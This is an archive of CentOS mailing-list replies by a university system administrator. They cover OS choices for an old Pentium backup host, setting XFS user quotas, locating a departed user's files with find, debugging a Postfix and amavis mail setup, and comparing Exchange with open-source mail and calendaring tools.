Re: [CentOS] OT: Linux recommendations for old Pentium PC
On 8/31/18 12:09 PM, Leon Fauster via CentOS wrote: Am 31.08.2018 um 16:29 schrieb Gary Stainburn : I've got a very small footprint rack server with a 4TB drive in that I wish to be a Bacula storeage device. However, it's got an old board / processor in it. We use mysql as database backend for bacula, and it becomes heavy loaded, over time especially wenn restoring respectively generating filelists. So, not sure if such old CPU provides enough compute power ... This is important for the machine hosting director. If database is hosted on different machine even that shouldn't be awfully loaded in my opinion. As far as the box hosting storage daemon is concerned, that dosn't need much of resources (like CPU or RAM - unless one uses NFS which I wouldn't), the only things to pay attention for that box would be network connection capacity and/or filesystem speed, whichever becomes a bottleneck. I hope, this helps. Valeri -- LF ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: Linux recommendations for old Pentium PC
On 8/31/18 10:47 AM, John Hodrien wrote: On Fri, 31 Aug 2018, mark wrote: CentOS will work, but you might start with minimal (but make sure it includes networking). Please note that I installed CentOS 6, just a few months ago, on an HP Netbook from '09, and it runs perfectly well. mark "see? I didn't say anything about systemd" CentOS 6 requires a PAE supporting CPU. Subject referenced Pentium CPU. I would not use system that has EOL (End Of Life) in a really close future. That would be waste of my time. Just mentioning. Valeri Pentiums do not support PAE, and so would not run CentOS 6 without fun and games and an alternative kernel. I previously had a Dell X1 with a Pentium M CPU, which also didn't advertise PAE support, so couldn't run the stock CentOS 6 kernel, which made installation a little more interesting. If you're really stubborn, there are options for mashing it on anyway, but I'm not sure I'd bother. In my case I think I just ran anaconda within C5 to install C6 onto another LV, put a non-PAE kernel on, then booted into the C6 install. jh ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: Linux recommendations for old Pentium PC
On 8/31/18 10:12 AM, Bee.Lists wrote: I’m fresh out of FreeBSD world. Depending on the port, it can be easy and predictable, or an absolute confusion-fest. FreeBSD ports should not be confused with FreeBSD system. Each of ports is maintained by different maintainer(s), some of them get obsolete, sometimes quickly, and not every software that is ported deserves in sane sysadmin's opinion to be offered to the users. And the same can be said about RPM collections (which are many, and one huge one would be Fedora's one) or deb packages collection of Debian (and its clones). All in all, if one gets confused sometimes, one can get confused using any open source system. On the other hand, before starting to offer some software to users, every sysadmin analyzes it carefully and tries to predict if it will stay alive for long time. As it is huge pain to migrate users to some alternative once the software of your choice becomes dead... And that is how sysadmins earn their salaries IMHO. Just my $0.02. Valeri On Aug 31, 2018, at 10:52 AM, Gary Stainburn wrote: Thanks for this. I haven't looked at FreeBSD since the 1990's or there abouts, but I'll give it a look. Cheers, Bee ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: Linux recommendations for old Pentium PC
On 8/31/18 9:52 AM, Gary Stainburn wrote: On Friday 31 August 2018 15:44:53 Valeri Galtsev wrote: I would use FreeBSD (and I do use FreeBSD for bacula, now bareos backup server and storage hosts), it has really small "footprint", and it is quite widespread. Incidentally, I was using bacula for very long time, but recently I switched to bacula's fork: bareos. You may want to consider the differences before you finalized everything in stone. Valeri Hi Valeri, Thanks for this. I haven't looked at FreeBSD since the 1990's or there abouts, but I'll give it a look. I'm also looking at lubuntu, but was hoping that there was a lcentos. We tend to like what we're used to. It is counter productive, and this list is wrong place to tell some alternative system is better than one or another Linux, hence this is the rant, ignore it, everyone who can: Linux kernel is IMHO overburdened by quite a lot of stuff that doesn't belong there. Hence higher chance of bugs (and almost all bugs in kernel have security implications). Adding to that not too rare glibc security patches, all in all in my observation on average you have to reboot Linux box once every 45 days. That became a statistics after switch from 2.4 to 2.6 kernel as I recollect, and one of my friends started to use word "Lindoze" when he was looking where to migrate his servers to those days... All in all for your hardware if I were to pick the system that is widely used and has small footprint and small demands to hardware specs, I would use FreeBSD. I hope, this helps. Valeri I'd be interested in your views on the differences between bacula and Bareos. I do have one Bareos storeage device but that's just in Bacula compat mode. Gary ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: Linux recommendations for old Pentium PC
On 8/31/18 9:29 AM, Gary Stainburn wrote: I've got a very small footprint rack server with a 4TB drive in that I wish to be a Bacula storeage device. However, it's got an old board / processor in it. Can anyone recommend a Dist that would work on it? I would use FreeBSD (and I do use FreeBSD for bacula, now bareos backup server and storage hosts), it has really small "footprint", and it is quite widespread. Incidentally, I was using bacula for very long time, but recently I switched to bacula's fork: bareos. You may want to consider the differences before you finalized everything in stone. Valeri ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] xfs quota question
On Thu, August 9, 2018 4:24 pm, mark wrote: > Valeri Galtsev wrote: >> On 08/09/18 14:57, mark wrote: >> >>> Can I go to an existing xfs file system, and apply a soft quota to each >>> user on it? If I do, can I then run a report, and see who's using how >>> much, or does it only apply to files created after the quotas are >>> applied? >> >> After remounting XFS filesystem with option "usrquota" you can issue the >> command similar to: >> >> xfs_quota -x -c "limit bsoft=8g bhard=10g -d" /home >> >> This command will enable the limits above for all users (-d flag), >> except users who have their limits existing already (usually ones who >> preformed fs operations). >> >> For those who already have some limits set you can still can change >> these limits, but with individual command, say in the loop, like: >> >> for i in `cat user_list`; \ do xfs_quota -x -c "limit bsoft=8g bhard=10g >> $i; \ >> done >> >> I hope, this helps. > > Will that work if I do a mount -o remount? If you are able to execute mount -o remount -o usrquota /mountpoint then you are OK. Normally, you will not be able to do it if there is even a single file open on the filesystem, Therefore if it is /home you do have to kick all users off. Executing any command related to quota will make it obvious if particular filesystem is mounted with quotas enabled or not. Good luck. Valeri > > mark Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] xfs quota question
On 08/09/18 14:57, mark wrote: Can I go to an existing xfs file system, and apply a soft quota to each user on it? If I do, can I then run a report, and see who's using how much, or does it only apply to files created after the quotas are applied? After remounting XFS filesystem with option "usrquota" you can issue the command similar to: xfs_quota -x -c "limit bsoft=8g bhard=10g -d" /home This command will enable the limits above for all users (-d flag), except users who have their limits existing already (usually ones who preformed fs operations). For those who already have some limits set you can still can change these limits, but with individual command, say in the loop, like: for i in `cat user_list`; \ do xfs_quota -x -c "limit bsoft=8g bhard=10g $i; \ done I hope, this helps. Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Finding user's files
On 08/01/18 10:10, mark wrote: This is among the things we need to do when a user leaves, and it's a larger question than it sounds. Our Office has many servers, with a good number of fileservers for projects, with large filesystems (i.e. 10's of TB). Can anyone think of a way *other* than running what's probably a many-hour long find / -user on all our systems, which is really intensive, to find all the files own by a given user? Locate would be great, but from the man pages and what I can find online, it only stores filenames and paths. If you want to be rigorous with result (and I for one would), avoid locate: that one is using database which is updated how often? *hmm*, once a week. find is the only command I will use for the task (and I definitely will use -uid instead of -user, just in case I already deleted user on one of the boxes I look for the user stuff, whereas numeric userid is what is there in file/directory attributes). I also wil look for stuff owned by user's individual group (separate command with -gid argument, as I may want to deal with these differently). Just my $0.02 Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Mail has quit working
and send the message, then break out of the tail command and copy/paste the output into your reply. Then also copy and paste the output of the following: $ postconf -nf; postconf -Mf If I need any more info after that I'll let you know. Peter ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Here's the output from tail: Jul 24 07:00:21 ts130 postfix/pickup[4017]: 338CA811240E: uid=0 from= Jul 24 07:00:21 ts130 postfix/cleanup[7047]: 338CA811240E: message-id=<20180724110021.338ca8112...@ts130.palmettodomains.com> Jul 24 07:00:21 ts130 postfix/qmgr[8283]: 338CA811240E: from=, size=461, nrcpt=1 (queue active) Jul 24 07:00:22 ts130 postfix/smtpd[7112]: connect from localhost[127.0.0.1] Jul 24 07:00:22 ts130 postfix/smtpd[7112]: 468E581DAB6C: client=localhost[127.0.0.1] Jul 24 07:00:22 ts130 postfix/cleanup[7047]: 468E581DAB6C: message-id=<20180724110021.338ca8112...@ts130.palmettodomains.com> Jul 24 07:00:22 ts130 postfix/qmgr[8283]: 468E581DAB6C: from=, size=946, nrcpt=1 (queue active) Jul 24 07:00:22 ts130 postfix/smtpd[7112]: disconnect from localhost[127.0.0.1] Jul 24 07:00:22 ts130 amavis[423]: (00423-02) Passed CLEAN {RelayedInbound}, [127.0.0.1] -> , Message-ID: <20180724110021.338ca8112...@ts130.palmettodomains.com>, mail_id: 8sW4ZXrbEdBD, Hits: 1.766, size: 461, queued_as: 468E581DAB6C, 1094 ms Jul 24 07:00:22 ts130 postfix/smtp[7049]: 338CA811240E: to=, relay=127.0.0.1[127.0.0.1]:10024, delay=1.1, delays=0.04/0/0/1.1, dsn=2.0.0, status=sent (250 2.0.0 from MTA(smtp:[127.0.0.1]:10025): 250 2.0.0 Ok: queued as 468E581DAB6C) Jul 24 07:00:22 ts130 postfix/qmgr[8283]: 338CA811240E: removed Jul 24 07:00:22 ts130 dovecot: lda(tdukes): msgid=<20180724110021.338ca8112...@ts130.palmettodomains.com>: saved mail to INBOX Jul 24 07:00:22 ts130 postfix/local[7113]: 468E581DAB6C: to=, relay=local, delay=0.11, delays=0.03/0.01/0/0.07, dsn=2.0.0, status=sent (delivered to command: /usr/libexec/dovecot/dovecot-lda -f "$SENDER" -a "$RECIPIENT") Jul 24 07:00:22 ts130 postfix/qmgr[8283]: 468E581DAB6C: removed Jul 24 07:04:04 ts130 postfix/smtpd[7053]: timeout after END-OF-MESSAGE from localhost[127.0.0.1] Jul 24 07:04:04 ts130 postfix/smtpd[7053]: disconnect from localhost[127.0.0.1] Jul 24 07:05:59 ts130 postfix/qmgr[8283]: C33128410546: from=, size=949, nrcpt=1 (queue active) Here's the output from postconf: smtp inet n - n - - smtpd -o content_filter=spamassassin pickup unix n - n 60 1 pickup cleanup unix n - n - 0 cleanup qmgr unix n - n 300 1 qmgr tlsmgr unix - - n 1000? 1 tlsmgr rewrite unix - - n - - trivial-rewrite bounce unix - - n - 0 bounce defer unix - - n - 0 bounce trace unix - - n - 0 bounce verify unix - - n - 1 verify flush unix n - n 1000? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp unix - - n - - smtp relay unix - - n - - smtp showq unix n - n - - showq error unix - - n - - error retry unix - - n - - error discard unix - - n - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - n - - lmtp anvil unix - - n - 1 anvil scache unix - - n - 1 scache spamassassin unix - n n - - pipe flags=R user=spamd argv=/usr/bin/spamc -e /usr/sbin/sendmail -oi -f ${sender} ${recipient} smtp-amavis unix - - n - 2 smtp -o smtp_data_done_timeout=1200 -o smtp_send_xforward_command=yes -o disable_dns_lookups=yes 127.0.0.1:10025 inet n - n - - smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_client_restrictions= -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks,reject -o mynetworks=127.0.0.0/8 -o strict_rfc821_envelopes=yes -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 Thanks ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Which is better? Microsoft Exchange 2016 or Linux-based SMTP Servers?
On Wed, July 18, 2018 11:42 am, Kenneth Porter wrote: > On 7/18/2018 9:03 AM, mark wrote: >> Based on experience at a number of jobs, Exchange may appear to be easy >> to >> configure, but as soon as you get past the utterly basic configuration, >> when management or other departments want more, it then becomes a major >> headache. > > I like to say that Windows is easier to install and initially configure, > but Linux is much easier to FIX. Things will always go wrong. > Closed-source Windows software hides everything and its GUI often lies > about the true state of what's going on under the hood. Open-source > software can be cracked open and I can dig down to root cause of any > problems. Check out the free support forums at Microsoft. It's pretty > hopeless. Responses to problems with open source software are generally > much more informative. Open source advocates love to show off how they > can fix problems. Closed source engineers aren't allowed to share > solutions with the public. If you really want support, you're going to > have to pay for it. So pay for the product, pay for the support, and nag > them like you own them. Or go with open source and pay a consultant. (Or > a hungry college student.) And on top of all: MS Windows is the only systems I know of whose vendor tells you, it is not safe to run without 3rd party software (antivirus). Antivirus itself is fundamentally flawed idea: you can not enumerate bad. You can enumerate good and prohibit everything else. So, antivirus is like thinking backwards. (But given long record of MS in building poorly architectured system, doing antivirus is sort of job security ;-) Valeri Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Which is better? Microsoft Exchange 2016 or Linux-based SMTP Servers?
On 07/19/18 09:14, Johnny Hughes wrote: On 07/18/2018 04:05 PM, Valeri Galtsev wrote: On 07/18/18 14:36, Johnny Hughes wrote: On 07/18/2018 01:58 PM, Valeri Galtsev wrote: But are you guys really telling you think the calendaring / scheduling for individual users and the main corporate account, etc. .. are working well enough with any Linux solution. I must confess, my servers are FreeBSD, but I'm quite sure the same is doable easily on Linux. We use for calendars Owncloud (may migrate to nextcloud in some future to come). That authenticates against LDAP. And does that calendar solution allow for things like: 1) Allowing all users in the organization to see users calendars and see when they are free to schedule a meeting with them. Yes at least about a part of it: calendars can be shared with some people or with everybody (which we didn't do, so I may be not 100% presenting "experimental fact" here). Not certain about "free/not free" mapped on calendars though. 2) Allow for designated people to schedule meetings for others (ie, your secretary/office assistant can schedule meetings for people, etc.) Yes, you can share calendar with anybody, and can set any set of choices can read can write can "re-share" your calendar You can share stuff to external people, and set individual authentication for them independent of our system (in general, it is not just calendars, but we use it for mostly synchronizing between all of your devices, and also sharing: files, calendars, address book; it can also be bookmarks, and there are variety of plugins expanding what else can be accessed/synchronized via web/dav) 3) Allow a calendar to schedule shared items .. like meeting rooms, shared vehicles, etc. So that people can check those out for specifc time windows, etc. No, but for resource booking (if I read the question correctly) we use mrbs (https://mrbs.sourceforge.io/). I know, that is not "integrated" for you to have everything in one place. I never had time to look for extention/plugin to suck from mrbs booked slot into one's calendar. Those are just a couple of minor things a lot of solutions can't do And do they work with imap, etc. No, owncloud/nextcloud don't work with IMAP as far as I know. Mail server is separate issue. Zimbra in that respect IS "integrated collaborative environment". And so is Kolab. They both are lacking per-user spam preferences. One more thing that added some minus for each of them in my estimate what to choose is: behind each of them there is commercial company. And that in my long experience significantly increases the chance one day openly available incarnation of each may become no longer available for us, and I will have to find replacement in a rush and find the way to migrate to it, and the more sophisticated the thing is, the trickier the migration will be. My answers are mostly about owncloud which we use for quite some time. Nextcloud is fork of owncloud, and to my regret nextcloud doesn't work with postgresql, only with mysql/MariaDB, whereas owncloud works with postgresql as well as with mysql/MariaDB (still we have some reasons to migrate to nextcloud at some point). I hope, someone with more knowledge will chime in. Don't get me wrong. I've run qmail, postfix, and zimbra mail servers with IMAP, along with webmail front ends (roundcude, squirrel mail, etc), for windows, mac and linux clients for several companies (all on CentOS of course :D) .. I just don't think that calendaring that I have seen is as user friendly as google calendar (for example). But I'm all for people running mail servers on CentOS (or any other Linux) if they want ! Zimbra does not work very well with Thunderbird and Lighting (for example) .. many solutions don't work with Windows or Mac clients, etc. For mail we use postfix, dovecot and maia for spam filtering (the last harnesses spamassassin, clamav and few other things). Of course, zimbra you mentioned earlier in the thread (or was it not you?), and Kolab provide more corporate-like collaboration environments, but I shied away from them as I set myself a goal to give users individual handle on spam/virus filtering in email, and neither of them has per-user spam preferences (take it with the grain of salt, I might have missed something...) Just my $0.02. My belated addition. This is great overview of nextcloud vs ovncloud features (which makes evident the set of abilities of each): https://civihosting.com/blog/nextcloud-vs-owncloud/ Valeri ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247
Re: [CentOS] Which is better? Microsoft Exchange 2016 or Linux-based SMTP Servers?
On 07/19/18 17:51, Alice Wonder wrote: On 07/19/2018 07:14 AM, Johnny Hughes wrote: On 07/18/2018 04:05 PM, Valeri Galtsev wrote: On 07/18/18 14:36, Johnny Hughes wrote: On 07/18/2018 01:58 PM, Valeri Galtsev wrote: But are you guys really telling you think the calendaring / scheduling for individual users and the main corporate account, etc. .. are working well enough with any Linux solution. I must confess, my servers are FreeBSD, but I'm quite sure the same is doable easily on Linux. We use for calendars Owncloud (may migrate to nextcloud in some future to come). That authenticates against LDAP. And does that calendar solution allow for things like: 1) Allowing all users in the organization to see users calendars and see when they are free to schedule a meeting with them. Yes at least about a part of it: calendars can be shared with some people or with everybody (which we didn't do, so I may be not 100% presenting "experimental fact" here). Not certain about "free/not free" mapped on calendars though. 2) Allow for designated people to schedule meetings for others (ie, your secretary/office assistant can schedule meetings for people, etc.) Yes, you can share calendar with anybody, and can set any set of choices can read can write can "re-share" your calendar You can share stuff to external people, and set individual authentication for them independent of our system (in general, it is not just calendars, but we use it for mostly synchronizing between all of your devices, and also sharing: files, calendars, address book; it can also be bookmarks, and there are variety of plugins expanding what else can be accessed/synchronized via web/dav) 3) Allow a calendar to schedule shared items .. like meeting rooms, shared vehicles, etc. So that people can check those out for specifc time windows, etc. No, but for resource booking (if I read the question correctly) we use mrbs (https://mrbs.sourceforge.io/). I know, that is not "integrated" for you to have everything in one place. I never had time to look for extention/plugin to suck from mrbs booked slot into one's calendar. Those are just a couple of minor things a lot of solutions can't do And do they work with imap, etc. No, owncloud/nextcloud don't work with IMAP as far as I know. Mail server is separate issue. Zimbra in that respect IS "integrated collaborative environment". And so is Kolab. They both are lacking per-user spam preferences. One more thing that added some minus for each of them in my estimate what to choose is: behind each of them there is commercial company. And that in my long experience significantly increases the chance one day openly available incarnation of each may become no longer available for us, and I will have to find replacement in a rush and find the way to migrate to it, and the more sophisticated the thing is, the trickier the migration will be. My answers are mostly about owncloud which we use for quite some time. Nextcloud is fork of owncloud, and to my regret nextcloud doesn't work with postgresql, only with mysql/MariaDB, whereas owncloud works with postgresql as well as with mysql/MariaDB (still we have some reasons to migrate to nextcloud at some point). I hope, someone with more knowledge will chime in. Don't get me wrong. I've run qmail, postfix, and zimbra mail servers with IMAP, along with webmail front ends (roundcude, squirrel mail, etc), for windows, mac and linux clients for several companies (all on CentOS of course :D) .. I just don't think that calendaring that I have seen is as user friendly as google calendar (for example). But I'm all for people running mail servers on CentOS (or any other Linux) if they want ! I can't use google calendar because it used tracking cookies which I block. So it doesn't work for me. Would actually love to see a distributed / federated calendaring platform developed, that I suspect would do well. Owncloud and nextcloud support federation. Valeri What I mean is Company A can choose to federate with Company B when needed to allow cross-scheduling when needed while both still maintain complete ownership of their calendar data. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Which is better? Microsoft Exchange 2016 or Linux-based SMTP Servers?
On 07/19/18 09:14, Johnny Hughes wrote: On 07/18/2018 04:05 PM, Valeri Galtsev wrote: On 07/18/18 14:36, Johnny Hughes wrote: On 07/18/2018 01:58 PM, Valeri Galtsev wrote: But are you guys really telling you think the calendaring / scheduling for individual users and the main corporate account, etc. .. are working well enough with any Linux solution. I must confess, my servers are FreeBSD, but I'm quite sure the same is doable easily on Linux. We use for calendars Owncloud (may migrate to nextcloud in some future to come). That authenticates against LDAP. And does that calendar solution allow for things like: 1) Allowing all users in the organization to see users calendars and see when they are free to schedule a meeting with them. Yes at least about a part of it: calendars can be shared with some people or with everybody (which we didn't do, so I may be not 100% presenting "experimental fact" here). Not certain about "free/not free" mapped on calendars though. 2) Allow for designated people to schedule meetings for others (ie, your secretary/office assistant can schedule meetings for people, etc.) Yes, you can share calendar with anybody, and can set any set of choices can read can write can "re-share" your calendar You can share stuff to external people, and set individual authentication for them independent of our system (in general, it is not just calendars, but we use it for mostly synchronizing between all of your devices, and also sharing: files, calendars, address book; it can also be bookmarks, and there are variety of plugins expanding what else can be accessed/synchronized via web/dav) 3) Allow a calendar to schedule shared items .. like meeting rooms, shared vehicles, etc. So that people can check those out for specifc time windows, etc. No, but for resource booking (if I read the question correctly) we use mrbs (https://mrbs.sourceforge.io/). I know, that is not "integrated" for you to have everything in one place. I never had time to look for extention/plugin to suck from mrbs booked slot into one's calendar. Those are just a couple of minor things a lot of solutions can't do And do they work with imap, etc. No, owncloud/nextcloud don't work with IMAP as far as I know. Mail server is separate issue. Zimbra in that respect IS "integrated collaborative environment". And so is Kolab. They both are lacking per-user spam preferences. One more thing that added some minus for each of them in my estimate what to choose is: behind each of them there is commercial company. And that in my long experience significantly increases the chance one day openly available incarnation of each may become no longer available for us, and I will have to find replacement in a rush and find the way to migrate to it, and the more sophisticated the thing is, the trickier the migration will be. My answers are mostly about owncloud which we use for quite some time. Nextcloud is fork of owncloud, and to my regret nextcloud doesn't work with postgresql, only with mysql/MariaDB, whereas owncloud works with postgresql as well as with mysql/MariaDB (still we have some reasons to migrate to nextcloud at some point). I hope, someone with more knowledge will chime in. Don't get me wrong. I've run qmail, postfix, and zimbra mail servers with IMAP, along with webmail front ends (roundcude, squirrel mail, etc), for windows, mac and linux clients for several companies (all on CentOS of course :D) .. I just don't think that calendaring that I have seen is as user friendly as google calendar (for example). But I'm all for people running mail servers on CentOS (or any other Linux) if they want ! No, I'm not getting you wrong. You gave nicely put set of properties [some]one may be interested to know of, which I tried to answer. Also: Thanks, Arif, for correcting/expanding in the other post what I said about owncloud/nextcloud. That was extremely helpful! As far as google anything goes, not everybody volunteers one's information into paws of google (and quite likely one or more of 3 letter agencies collecting information that way). I know (call it educated guess) that about 70% of messages I send are ending up in google databases whether I want it or not. Someone said quite some time ago: you don't need to recruit spies anymore, just roll out "free" services, and information will trickle to you. I am old enough to know what collection of information on everybody leads to (Hitler Germany, Stalin Russia, ...), but I also know that the worst lesson of history is: people do not learn lessons of history. So, I do the best I can do: roll out services people I work for may need, and avoid by any means advertising google whatever myself, I just keep neutral when that surfaces in discussions with my people. Valeri Zimbra does not work very well with Thunderbird and Lighting (for example) .. many solutions
Re: [CentOS] Which is better? Microsoft Exchange 2016 or Linux-based SMTP Servers?
On 07/18/18 14:36, Johnny Hughes wrote: On 07/18/2018 01:58 PM, Valeri Galtsev wrote: But are you guys really telling you think the calendaring / scheduling for individual users and the main corporate account, etc. .. are working well enough with any Linux solution. I must confess, my servers are FreeBSD, but I'm quite sure the same is doable easily on Linux. We use for calendars Owncloud (may migrate to nextcloud in some future to come). That authenticates against LDAP. And does that calendar solution allow for things like: 1) Allowing all users in the organization to see users calendars and see when they are free to schedule a meeting with them. Yes at least about a part of it: calendars can be shared with some people or with everybody (which we didn't do, so I may be not 100% presenting "experimental fact" here). Not certain about "free/not free" mapped on calendars though. 2) Allow for designated people to schedule meetings for others (ie, your secretary/office assistant can schedule meetings for people, etc.) Yes, you can share calendar with anybody, and can set any set of choices can read can write can "re-share" your calendar You can share stuff to external people, and set individual authentication for them independent of our system (in general, it is not just calendars, but we use it for mostly synchronizing between all of your devices, and also sharing: files, calendars, address book; it can also be bookmarks, and there are variety of plugins expanding what else can be accessed/synchronized via web/dav) 3) Allow a calendar to schedule shared items .. like meeting rooms, shared vehicles, etc. So that people can check those out for specifc time windows, etc. No, but for resource booking (if I read the question correctly) we use mrbs (https://mrbs.sourceforge.io/). I know, that is not "integrated" for you to have everything in one place. I never had time to look for extention/plugin to suck from mrbs booked slot into one's calendar. Those are just a couple of minor things a lot of solutions can't do And do they work with imap, etc. No, owncloud/nextcloud don't work with IMAP as far as I know. Mail server is separate issue. Zimbra in that respect IS "integrated collaborative environment". And so is Kolab. They both are lacking per-user spam preferences. One more thing that added some minus for each of them in my estimate what to choose is: behind each of them there is commercial company. And that in my long experience significantly increases the chance one day openly available incarnation of each may become no longer available for us, and I will have to find replacement in a rush and find the way to migrate to it, and the more sophisticated the thing is, the trickier the migration will be. My answers are mostly about owncloud which we use for quite some time. Nextcloud is fork of owncloud, and to my regret nextcloud doesn't work with postgresql, only with mysql/MariaDB, whereas owncloud works with postgresql as well as with mysql/MariaDB (still we have some reasons to migrate to nextcloud at some point). I hope, someone with more knowledge will chime in. Valeri Zimbra does not work very well with Thunderbird and Lighting (for example) .. many solutions don't work with Windows or Mac clients, etc. For mail we use postfix, dovecot and maia for spam filtering (the last harnesses spamassassin, clamav and few other things). Of course, zimbra you mentioned earlier in the thread (or was it not you?), and Kolab provide more corporate-like collaboration environments, but I shied away from them as I set myself a goal to give users individual handle on spam/virus filtering in email, and neither of them has per-user spam preferences (take it with the grain of salt, I might have missed something...) Just my $0.02. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Which is better? Microsoft Exchange 2016 or Linux-based SMTP Servers?
On 07/18/18 13:27, Johnny Hughes wrote: On 07/18/2018 12:33 PM, Valeri Galtsev wrote: On 07/18/18 12:24, Andrew Holway wrote: Still a lot better than trying to run your own hodge-podge of nightmares on Linux. Beg pardon? Did I make a mistake on the email address? I thought this went to the CentOS general discussion list. I specifically meant setting up and running email services on linux is not for the feint of heart and delivers little real value considering the plethora of free and commercial email services available. Andrew, you should understand that you are talking to experts in Linux here. And even I (and I'm not considering myself an expert in Linux) have no trouble to set up mail server on Linux (with all blows and whistles like spam/virus filtering, etc). So, Mark meant to say your posts are offensive to Experts on this list. Please, take a note of it. So, I don't think anyone can call me a 'non linux' guy :) But are you guys really telling you think the calendaring / scheduling for individual users and the main corporate account, etc. .. are working well enough with any Linux solution. I must confess, my servers are FreeBSD, but I'm quite sure the same is doable easily on Linux. We use for calendars Owncloud (may migrate to nextcloud in some future to come). That authenticates against LDAP. For mail we use postfix, dovecot and maia for spam filtering (the last harnesses spamassassin, clamav and few other things). Of course, zimbra you mentioned earlier in the thread (or was it not you?), and Kolab provide more corporate-like collaboration environments, but I shied away from them as I set myself a goal to give users individual handle on spam/virus filtering in email, and neither of them has per-user spam preferences (take it with the grain of salt, I might have missed something...) Just my $0.02. Valeri I have researched this very recently and I have not found a solution that works even reasonably well. Red Hat has even shifted their calendars to Google .. does anyone think if an enterprise calendar that really worked was out there they would not be using it? ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Which is better? Microsoft Exchange 2016 or Linux-based SMTP Servers?
